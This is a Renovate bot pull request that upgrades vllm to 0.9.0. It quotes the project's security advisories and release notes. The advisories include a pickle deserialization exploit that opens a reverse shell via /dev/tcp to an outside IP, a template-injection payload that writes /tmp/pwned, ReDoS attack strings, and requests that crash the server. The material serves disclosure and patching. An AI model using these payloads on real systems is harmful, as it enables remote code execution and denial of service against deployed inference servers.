Skip to content

Conversation

@renovate
Copy link

@renovate renovate bot commented Apr 17, 2025

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vllm ==0.8.0 -> ==0.9.0 age adoption passing confidence

GitHub Vulnerability Alerts

GHSA-hf3c-wxg2-49q9

Impact

This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: GHSA-389x-67px-mjg3

The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.

A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.

Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the guided_decoding_backend key of the extra_body field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.

Patches

Workarounds

There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.

References

CVE-2025-30202

Impact

In a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an XPUB ZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts.

Any client with network access to this host can connect to this XPUB socket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcasted to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker.

By potentially connecting to this socket many times and not reading data published to them, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher.

Detailed Analysis

The XPUB socket in question is created here:

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L236-L237

Data is published over this socket via MessageQueue.enqueue() which is called by MessageQueue.broadcast_object():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L452-L453

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L475-L478

The MessageQueue.broadcast_object() method is called by the GroupCoordinator.broadcast_object() method in parallel_state.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L364-L366

The broadcast over ZeroMQ is only done if the GroupCoordinator was created with use_message_queue_broadcaster set to True:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L216-L219

The only case where GroupCoordinator is created with use_message_queue_broadcaster is the coordinator for the tensor parallelism group:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L931-L936

To determine what data is broadcasted to the tensor parallism group, we must continue tracing. GroupCoordinator.broadcast_object() is called by GroupCoordinator.broadcoast_tensor_dict():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L489

which is called by broadcast_tensor_dict() in communication_op.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/communication_op.py#L29-L34

If we look at _get_driver_input_and_broadcast() in the V0 worker_base.py, we'll see how this tensor dict is formed:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/worker/worker_base.py#L332-L352

but the data actually sent over ZeroMQ is the metadata_list portion that is split from this tensor_dict. The tensor parts are sent via torch.distributed and only metadata about those tensors is sent via ZeroMQ.

https://github.com/vllm-project/vllm/blob/54a66e5fee4a1ea62f1e4c79a078b20668e408c6/vllm/distributed/parallel_state.py#L61-L83

Patches

Workarounds

Prior to the fix, your options include:

  1. Do not expose the vLLM host to a network where any untrusted connections may reach the host.
  2. Ensure that only the other vLLM hosts are able to connect to the TCP port used for the XPUB socket. Note that port used is random.

References

CVE-2025-32444

Impacted Deployments

Note that vLLM instances that do NOT make use of the mooncake integration are NOT vulnerable.

Description

vLLM integration with mooncake is vaulnerable to remote code execution due to using pickle based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack.

This is a similar to GHSA - x3m8 - f7g5 - qhm7, the problem is in

https://github.com/vllm-project/vllm/blob/32b14baf8a1f7195ca09484de3008063569b43c5/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L179

Here recv_pyobj() Contains implicit pickle.loads(), which leads to potential RCE.

CVE-2025-46560

Summary

A critical performance vulnerability has been identified in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to ​​inefficient list concatenation operations​​, the algorithm exhibits ​​quadratic time complexity (O(n²))​​, allowing malicious actors to trigger resource exhaustion via specially crafted inputs.

Details

​​Affected Component​​: input_processor_for_phi4mm function.
https://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197

The code modifies the input_ids list in-place using input_ids = input_ids[:i] + tokens + input_ids[i+1:]. Each concatenation operation copies the entire list, leading to O(n) operations per replacement. For k placeholders expanding to m tokens, total time becomes O(kmn), approximating O(n²) in worst-case scenarios.

PoC

Test data demonstrates exponential time growth:

test_cases = [100, 200, 400, 800, 1600, 3200, 6400]
run_times = [0.002, 0.007, 0.028, 0.136, 0.616, 2.707, 11.854]  # seconds

Doubling input size increases runtime by ~4x (consistent with O(n²)).

Impact

​​Denial-of-Service (DoS):​​ An attacker could submit inputs with many placeholders (e.g., 10,000 <|audio_1|> tokens), causing CPU/memory exhaustion.
Example: 10,000 placeholders → ~100 million operations.

Remediation Recommendations​

Precompute all placeholder positions and expansion lengths upfront.
Replace dynamic list concatenation with a single preallocated array.

# Pseudocode for O(n) solution
new_input_ids = []
for token in input_ids:
    if token is placeholder:
        new_input_ids.extend([token] * precomputed_length)
    else:
        new_input_ids.append(token)

CVE-2025-47277

Impacted Environments

This issue ONLY impacts environments using the PyNcclPipe KV cache transfer integration with the V0 engine. No other configurations are affected.

Summary

vLLM supports the use of the PyNcclPipe class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the PyNcclCommunicator class, while CPU-side control message passing is handled via the send_obj and recv_obj methods on the CPU side.​

A remote code execution vulnerability exists in the PyNcclPipe service. Attackers can exploit this by sending malicious serialized data to gain server control privileges.

The intention was that this interface should only be exposed to a private network using the IP address specified by the --kv-ip CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html

Unfortunately, the default behavior from PyTorch is that the TCPStore interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the TCPStore instance to bind its socket to a specified private interface.

This issue was reported privately to PyTorch and they determined that this behavior was intentional.

Details

The PyNcclPipe implementation contains a critical security flaw where it directly processes client-provided data using pickle.loads , creating an unsafe deserialization vulnerability that can lead to ​Remote Code Execution.

  1. Deploy a PyNcclPipe service configured to listen on port 18888 when launched:
from vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe
from vllm.config import KVTransferConfig

config=KVTransferConfig(
    kv_ip="0.0.0.0",
    kv_port=18888,
    kv_rank=0,
    kv_parallel_size=1,
    kv_buffer_size=1024,
    kv_buffer_device="cpu"
)

p=PyNcclPipe(config=config,local_rank=0)
p.recv_tensor() # Receive data
  1. The attacker crafts malicious packets and sends them to the PyNcclPipe service:
from vllm.distributed.utils import StatelessProcessGroup

class Evil:
    def __reduce__(self):
        import os
        cmd='/bin/bash -c "bash -i >& /dev/tcp/172.28.176.1/8888 0>&1"'
        return (os.system,(cmd,))

client = StatelessProcessGroup.create(
    host='172.17.0.1',
    port=18888,
    rank=1,
    world_size=2,
)

client.send_obj(obj=Evil(),dst=0)

The call stack triggering ​RCE is as follows:

vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl
	-> vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata
		-> vllm.distributed.utils.StatelessProcessGroup.recv_obj
			-> pickle.loads 

Getshell as follows:

image

Reporters

This issue was reported independently by three different parties:

  • @​kikayli (Zhuque Lab, Tencent)
  • @​omjeki
  • Russell Bryant (@​russellb)

Fix

CVE-2025-48887

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.

Details

The following regular expression is used to match tool/function call patterns:

r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"

This pattern contains multiple nested quantifiers (*, +), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking.

Attack Example:
A malicious input such as

[A(A=	)A(A=,		)A(A=,		)A(A=,		)... (repeated dozens of times) ...]

or

"[A(A=" + "\t)A(A=,\t" * repeat

can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).

Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.

Length: 22, Time: 0.0000 seconds, Match: False
Length: 38, Time: 0.0010 seconds, Match: False
Length: 54, Time: 0.0250 seconds, Match: False
Length: 70, Time: 0.5185 seconds, Match: False
Length: 86, Time: 13.2703 seconds, Match: False
Length: 102, Time: 319.0717 seconds, Match: False

Impact

  • Denial of Service (DoS): An attacker can trigger a denial of service by sending specially crafted payloads to any API or interface that invokes this regex, causing excessive CPU usage and making the vLLM service unavailable.
  • Resource Exhaustion and Memory Retention: As this regex is invoked during function call parsing, the matching process may hold on to significant CPU and memory resources for extended periods (due to catastrophic backtracking). In the context of vLLM, this also means that the associated KV cache (used for model inference and typically stored in GPU memory) is not released in a timely manner. This can lead to GPU memory exhaustion, degraded throughput, and service instability.
  • Potential for Broader System Instability: Resource exhaustion from stuck or slow requests may cascade into broader system instability or service downtime if not mitigated.

Fix

GHSA-j828-28rj-hfhp

Summary

A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.

1. vllm/lora/utils.py Line 173

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:

  • The regex r"\((.*?)\)\$?$" matches content inside parentheses. If input such as ((((a|)+)+)+) is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability.
  • Using .*? (non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.

Remediation Suggestions:

  • Limit the input string length.
  • Use a non-recursive matching approach, or write a regex with stricter content constraints.
  • Consider using possessive quantifiers or atomic groups (not supported in Python yet), or split and process before regex matching.

2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52

Risk Description:

  • The regex r'functools\[(.*?)\]' uses .*? to match content inside brackets, together with re.DOTALL. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.

Remediation Suggestions:

  • Limit the length of model_output.
  • Use a stricter, non-greedy pattern (avoid matching across extraneous nesting).
  • Prefer re.finditer() and enforce a length constraint on each match.

3. vllm/entrypoints/openai/serving_chat.py Line 351

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351

Risk Description:

  • The regex r'.*"parameters":\s*(.*)' can trigger backtracking if current_text is very long and contains repeated structures.
  • Especially when processing strings from unknown sources, .* matching any content is high risk.

Remediation Suggestions:

  • Use a more specific pattern (e.g., via JSON parsing).
  • Impose limits on current_text length.
  • Avoid using .* to capture large blocks of text; prefer structured parsing when possible.

4. benchmarks/benchmark_serving_structured_output.py Line 650

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650

Risk Description:

  • The regex r'\{.*\}' is used to extract JSON inside curly braces. If the actual string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.
  • Although this is used for benchmark correctness checking, it should still handle abnormal inputs carefully.

Remediation Suggestions:

  • Limit the length of actual.
  • Prefer stepwise search for { and } or use a robust JSON extraction tool.
  • Recommend first locating the range with simple string search, then applying regex.

Fix


CVE-2025-46570

This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.

Description

When a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.

For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.

Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.

Environment

  • GPU: NVIDIA A100 (40G)
  • CUDA: 11.8
  • PyTorch: 2.3.1
  • OS: Ubuntu 18.04
  • vLLM: v0.5.1
    Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.

Leakage

We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.
roc_curves_combined_block_2

Results

In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:

  • With a 1-token prefix, the ROC curve yielded an AUC value of 0.571, indicating that even with a short prefix, an attacker can reasonably distinguish between cache hits and misses based on response times.
  • When the prefix length increases to 8 tokens, the AUC value rises significantly to 0.99, showing that the attacker can almost perfectly identify cache hits with a longer prefix.

Fixes

CVE-2025-46722

Summary

In the file vllm/multimodal/hasher.py, the MultiModalHasher class has a security and data integrity issue in its image hashing method. Currently, it serializes PIL.Image.Image objects using only obj.tobytes(), which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.

Details

  • Affected file: vllm/multimodal/hasher.py
  • Affected method: MultiModalHasher.serialize_item
    https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
  • Current behavior: For Image.Image instances, only obj.tobytes() is used for hashing.
  • Problem description: obj.tobytes() does not include the image’s width, height, or mode metadata.
  • Impact: Two images with the same pixel byte sequence but different sizes could be regarded as the same image by the cache and hashing system, which may result in:
    • Incorrect cache hits, leading to abnormal responses
    • Deliberate construction of images with different meanings but the same hash value

Recommendation

In the serialize_item method, serialization of Image.Image objects should include not only pixel data, but also all critical metadata—such as dimensions (size), color mode (mode), format, and especially the info dictionary. The info dictionary is particularly important in palette-based images (e.g., mode 'P'), where the palette itself is stored in info. Ignoring info can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.

Summary:
Serializing only the raw pixel data is insecure. Always include all image metadata (size, mode, format, info) in the hash calculation to prevent collisions, especially in cases like palette-based images.

Impact for other modalities
For the influence of other modalities, since the video modality is transformed into a multi-dimensional array containing the length, width, time, etc. of the video, the same problem exists due to the incorrect sequence of numpy as well.

For audio, since the momo function is not enabled in librosa.load, the loaded audio is automatically encoded into single channels by librosa and returns a one-dimensional array of numpy, thus keeping the structure of numpy fixed and not affected by this issue.

Fixes

CVE-2025-48942

Summary

Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server

Details

The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke a Uncaught exceptions from xgrammer in
./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vllm with invalid json_scema e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vllm crashes

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar
ERROR 03-26 17:25:01 [core.py:340]     completed = self._check_grammar_completion()
ERROR 03-26 17:25:01 [core.py:340]                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion
ERROR 03-26 17:25:01 [core.py:340]     self._grammar = self._grammar.result(timeout=0.0001)
ERROR 03-26 17:25:01 [core.py:340]                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result
ERROR 03-26 17:25:01 [core.py:340]     return self.__get_result()
ERROR 03-26 17:25:01 [core.py:340]            ^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result
ERROR 03-26 17:25:01 [core.py:340]     raise self._exception
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run
ERROR 03-26 17:25:01 [core.py:340]     result = self.fn(*self.args, **self.kwargs)
ERROR 03-26 17:25:01 [core.py:340]              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar
ERROR 03-26 17:25:01 [core.py:340]     ctx = self.compiler.compile_json_schema(grammar_spec,
ERROR 03-26 17:25:01 [core.py:340]           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema
ERROR 03-26 17:25:01 [core.py:340]     self._handle.compile_json_schema(
ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool
ERROR 03-26 17:25:01 [core.py:340] 
ERROR 03-26 17:25:01 [core.py:340] 
CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.

Fix

CVE-2025-48943

Impact

A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema.

Issue with more details: https://github.com/vllm-project/vllm/issues/17313

Patches

CVE-2025-48944

Summary

The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.

Details

The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:

RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"

The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.

For example, the following inputs will crash the worker:

Unclosed {, [, or (

Closed:{} and []

Here are some of runtime errors on the crash depending on what gets injected:

RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.

PoC

Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
"model": "mistral-nemo-instruct",
"messages": [{ "role": "user", "content": "crash via type" }],
"tools": [
{
"type": "function",
"function": {
"name": "crash01",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "something"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash01",
"arguments": { "a": "test" }
}
},
"stream": false,
"max_tokens": 1
}

Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker.

POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
"model": "mistral-nemo-instruct",
"messages": [
{
"role": "user",
"content": "Crash via Pattern"
}
],
"tools": [
{
"type": "function",
"function": {
"name": "crash02",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "string",
"pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash02"
}
},
"stream": false,
"max_tokens": 32,
"temperature": 0.2,
"top_p": 1,
"n": 1
}

Impact

Backend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests.

Fix


Release Notes

vllm-project/vllm (vllm)

v0.9.0

Compare Source

Highlights

This release features 649 commits, from 215 contributors (82 new contributors!)

  • vLLM has upgraded to PyTorch 2.7! (#​16859) This is a breaking change for environment dependency.
    • The default wheel has been upgraded from CUDA 12.4 to CUDA 12.8. We will distribute CUDA 12.6 wheel on GitHub artifact.
    • As a general rule of thumb, our CUDA version policy follow PyTorch's CUDA version policy.
  • Enhanced NVIDIA Blackwell support. vLLM now ships with initial set of optimized kernels on NVIDIA Blackwell with both attention and mlp.
    • You can use our docker image or install FlashInfer nightly wheel pip install https://download.pytorch.org/whl/cu128/flashinfer/flashinfer_python-0.2.5%2Bcu128torch2.7-cp38-abi3-linux_x86_64.whl then set VLLM_ATTENTION_BACKEND=FLASHINFER for better performance.
    • Upgraded support for the new FlashInfer main branch. (#​15777)
    • Please checkout https://github.com/vllm-project/vllm/issues/18153 for the full roadmap
  • Initial DP, EP, PD support for large scale inference
    • EP:
      • Permute and unpermute kernel for moe optimization (#​14568)
      • Modularize fused experts and integrate PPLX kernels (#​15956)
      • Refactor pplx init logic to make it modular (prepare for deepep) (#​18200)
      • Add ep group and all2all interface (#​18077)
    • DP:
      • Decouple engine process management and comms (#​15977)
    • PD:
  • Migrate docs from Sphinx to MkDocs (#​18145, #​18610, #​18614, #​18616. #​18622, #​18626, #​18627, #​18635, #​18637, #​18657, #​18663, #​18666, #​18713)
Notable Changes
  • Removal of CUDA 12.4 support due to PyTorch upgrade to 2.7.
  • Change top_k to be disabled with 0 (still accept -1 for now) (#​17773)
  • The seed is now set to 0 by default for V1 Engine, meaning that different vLLM runs now yield the same outputs even if temperature > 0. This does not modify the random state in user code since workers are run in separate processes unless VLLM_USE_V1_MULTIPROCESSING=0. (#​17929, #​18741)
Model Enhancements
Performance, Production and Scaling
  • Support full cuda graph in v1 (#​16072)
  • Pipeline Parallelism: MultiprocExecutor support (#​14219), torchrun (#​17827)
  • Support sequence parallelism combined with pipeline parallelism (#​18243)
  • Async tensor parallelism using compilation pass (#​17882)
  • Perf: Use small max_num_batched_tokens for A100 (#​17885)
  • Fast Model Loading: Tensorizer support for V1 and LoRA (#​17926)
  • Multi-modality: Automatically cast multi-modal input dtype before transferring device (#​18756)
Security
  • Prevent side-channel attacks via cache salting (#​17045)
  • Fix image hash collision in certain edge cases (#​17378)
  • Add VLLM_ALLOW_INSECURE_SERIALIZATION env var (#​17490)
  • Migrate to REGEX Library to prevent catastrophic backtracking (#​18454, #​18750)
Features
Hardwares
Documentation
  • Update quickstart and install for cu128 using --torch-backend=auto (#​18505)
  • NVIDIA TensorRT Model Optimizer (#​17561)
  • Usage of Qwen3 thinking (#​18291)
Developer Facing

What's Changed


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from c2ec817 to 305da83 Compare May 1, 2025 00:09
@renovate renovate bot changed the title Update dependency vllm to v0.8.4 [SECURITY] Update dependency vllm to v0.8.5 [SECURITY] May 1, 2025
@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from 305da83 to 6261197 Compare May 31, 2025 23:44
@renovate renovate bot changed the title Update dependency vllm to v0.8.5 [SECURITY] Update dependency vllm to v0.9.0 [SECURITY] May 31, 2025
@renovate renovate bot changed the title Update dependency vllm to v0.9.0 [SECURITY] Update dependency vllm to v0.9.0 [SECURITY] - autoclosed Jul 10, 2025
@renovate renovate bot closed this Jul 10, 2025
@renovate renovate bot deleted the renovate/pypi-vllm-vulnerability branch July 10, 2025 13:41
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant